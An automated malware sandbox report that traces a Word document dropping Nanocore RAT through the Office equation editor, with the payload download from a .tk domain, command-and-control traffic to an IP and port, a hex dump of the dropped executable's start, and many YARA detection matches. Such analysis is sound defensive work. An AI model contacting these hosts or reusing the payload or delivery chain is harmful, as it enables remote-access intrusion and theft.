HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Oct 2021 12:32:28 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Tue, 26 Oct 2021 07:03:38 GMTETag: "59e00-5cf3c13a7ae42"Accept-Ranges: bytesContent-Length: 368128Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 58 87 77 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 94 05 00 00 08 00 00 00 00 00 00 f6 b2 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 b2 05 00 4f 00 00 00 00 c0 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fc 92 05 00 00 20 00 00 00 94 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 c0 05 00 00 06 00 00 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 05 00 00 02 00 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 b2 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 3f 00 00 e4 41 00 00 03 00 00 00 7d 00 00 06 a4 81 00 00 00 31 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 1e 02 7b 02 00 00 04 2a 22 02 03 7d 02 00 00 04 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05 00 00 04 2a 00 00 00 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 42 6f 02 00 00 06 00 25 1f 50 6f 04 00 00 06 00 25 1f 44 6f 06 00 00 06 00 25 1f 49 6f 08 00 00 06 00 25 1f 57 6f 0a 00 00 06 00 0a 2b 00 06 2a 13 30 03 00 38 00 00 00 01 00 00 11 00 73 0d 00 00 06 25 1f 6f 6f 02 00 00 06 00 25 1f 2b 6f 04 00 00 06 00 25 1f 2d 6f 06 00 00 06 00 25 1f 2a 6f 08 00 00 06 00 25 1f 3d 6f 0a 00 00 06 00 0a 2b 00 06 2a 22 02 28 14 00 00 0a 00 2a 00 00 00 13 30 04 00 20 00 00 00 02 00 00 11 00 19 8d 0f 00 00 01 25 16 72 01 00 00 70 a2 25 17 72 37 00 00 70 a2 25 18 02 a2 0a 2b 00 06 2a 26 02 28 14 00 00 0a 00 00 2a 00 00

Source: global traffic

HTTP traffic detected: GET /catzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 103.133.109.121:1665

Source: RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: schtasks.exe, 00000005.00000002.449453962.0000000000870000.00000002.00020000.sdmp, schtasks.exe, 00000008.00000002.460736263.0000000001CF0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: catzjt7863.exe, 00000004.00000002.457062751.00000000055D0000.00000002.00020000.sdmp, RegSvcs.exe, 00000007.00000002.706673086.00000000059A0000.00000002.00020000.sdmp, taskeng.exe, 0000000A.00000002.704777808.0000000001BC0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: catzjt7863.exe, 00000004.00000002.454334309.0000000000950000.00000004.00020000.sdmp	String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9294EB41-BC98-4811-8155-5BA310CE0BF9}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: binatonezx.tk

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 7_2_003D2EA6 WSARecv,

7_2_003D2EA6

Source: global traffic

Source: RegSvcs.exe

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.550000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.2641260.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.2.RegSvcs.exe.560000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.2.RegSvcs.exe.367dacc.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 7.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.catzjt7863.exe.359c310.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.455467498.00000000034FB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.455829246.000000000374F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: catzjt7863.exe PID: 1848, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2936, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\catzx[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\catzjt7863.exe			Jump to dropped file

Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.3678c96.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.560000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.catzjt7863.exe.36dc7e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.550000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.550000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.564629.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.catzjt7863.exe.36dc7e0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.2641260.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.2641260.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4.2.catzjt7863.exe.35f0330.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.36820f5.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.RegSvcs.exe.367dacc.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
